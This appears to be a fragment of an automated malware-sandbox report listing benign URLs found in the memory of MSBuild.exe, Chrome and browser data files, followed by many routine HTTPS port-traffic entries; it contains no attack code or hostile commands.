                Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, jwb1v3.15.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: chrome.exe, 00000011.00000003.1433605279.000046FC02494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446580751.000046FC02498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                Source: chrome.exe, 00000011.00000003.1433605279.000046FC02494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446580751.000046FC02498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                Source: chrome.exe, 00000011.00000003.1446580751.000046FC02498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: chrome.exe, 00000011.00000003.1425524155.000046FC02EE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1425865507.000046FC02EC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2011477912.000000000402A000.00000004.00000020.00020000.00000000.sdmp, zmy5pp.15.dr, jwb1v3.15.dr, Web Data.21.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: chrome.exe, 00000011.00000003.1446902159.000046FC0355C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446713708.000046FC034DF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446074641.000046FC0355C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446902159.000046FC03578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                Source: chrome.exe, 00000011.00000003.1446816707.000046FC035C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                Source: chrome.exe, 00000011.00000003.1432562852.000046FC02525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
                Source: chrome.exe, 00000011.00000003.1433605279.000046FC02494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                Source: chrome.exe, 00000011.00000003.1446580751.000046FC02498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: chrome.exe, 00000011.00000003.1446580751.000046FC02498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: chromecache_698.18.drString found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
                Source: chromecache_698.18.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
                Source: chromecache_698.18.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
                Source: chrome.exe, 00000011.00000003.1447058718.000046FC03646000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                Source: chrome.exe, 00000011.00000003.1446418498.000046FC0317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446074641.000046FC0355C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1447058718.000046FC03646000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                Source: chrome.exe, 00000011.00000003.1446816707.000046FC035C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.GeV8o4Zu9xM.2019.O/rt=j/m=q_dnp
                Source: chrome.exe, 00000011.00000003.1446816707.000046FC035C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.ibLFXwX0rCY.L.W.O/m=qmd
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://www.iheart.com/podcast/
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://www.instagram.com
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://www.last.fm/
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://www.messenger.com
                Source: MSBuild.exe, 0000000F.00000002.2016179797.0000000004602000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.c0yfKF26qNRb
                Source: MSBuild.exe, 0000000F.00000002.2016179797.0000000004602000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.w0HgyL2ZPBj2
                Source: MSBuild.exe, 0000000F.00000002.2016179797.0000000004602000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                Source: MSBuild.exe, 0000000F.00000002.2016179797.0000000004602000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: MSBuild.exe, 0000000F.00000002.2016179797.0000000004602000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: 000003.log6.21.drString found in binary or memory: https://www.msn.com
                Source: 000003.log3.21.drString found in binary or memory: https://www.msn.com/
                Source: 2cc80dabc69f58b6_1.21.dr, 4cb013792b196a35_1.21.drString found in binary or memory: https://www.msn.com/web-notification-icon-light.png
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
                Source: Session_13382730677706579.21.drString found in binary or memory: https://www.msn.com/widgets/fullpage/distribution/edgewelcome?experiences=DistributionPage&ocid=edge
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://www.office.com
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
                Source: MSBuild.exe, 0000000F.00000002.2006634073.000000000100B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2013453032.00000000043EA000.00000004.00000020.00020000.00000000.sdmp, 2noh4e.15.drString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://www.youtube.com
                Source: chrome.exe, 00000011.00000003.1460673087.000046FC03D79000.00000004.00000800.00020000.00000000.sdmp, Favicons.21.drString found in binary or memory: https://www.youtube.com/
                Source: chrome.exe, 00000011.00000003.1460673087.000046FC03D79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/-
                Source: chrome.exe, 00000011.00000003.1451551802.000046FC03314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1460938291.000046FC03DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                Source: chrome.exe, 00000011.00000003.1460938291.000046FC03DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytcaF
                Source: chrome.exe, 00000011.00000003.1460938291.000046FC03DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytcaogl
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://y.music.163.com/m/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50184
                Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50188
                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
                Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
                Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50252
                Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50254
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50253
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50255
                Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                Source: unknownNetwork traffic detected: HTTP traffic on port 50253 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50159
                Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
                Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50162
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50161
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50188 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50168
                Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50171
                Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50173
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50172
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50218
                Source: unknownNetwork traffic detected: HTTP traffic on port 50254 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50248 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50230
                Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50248
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50218 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
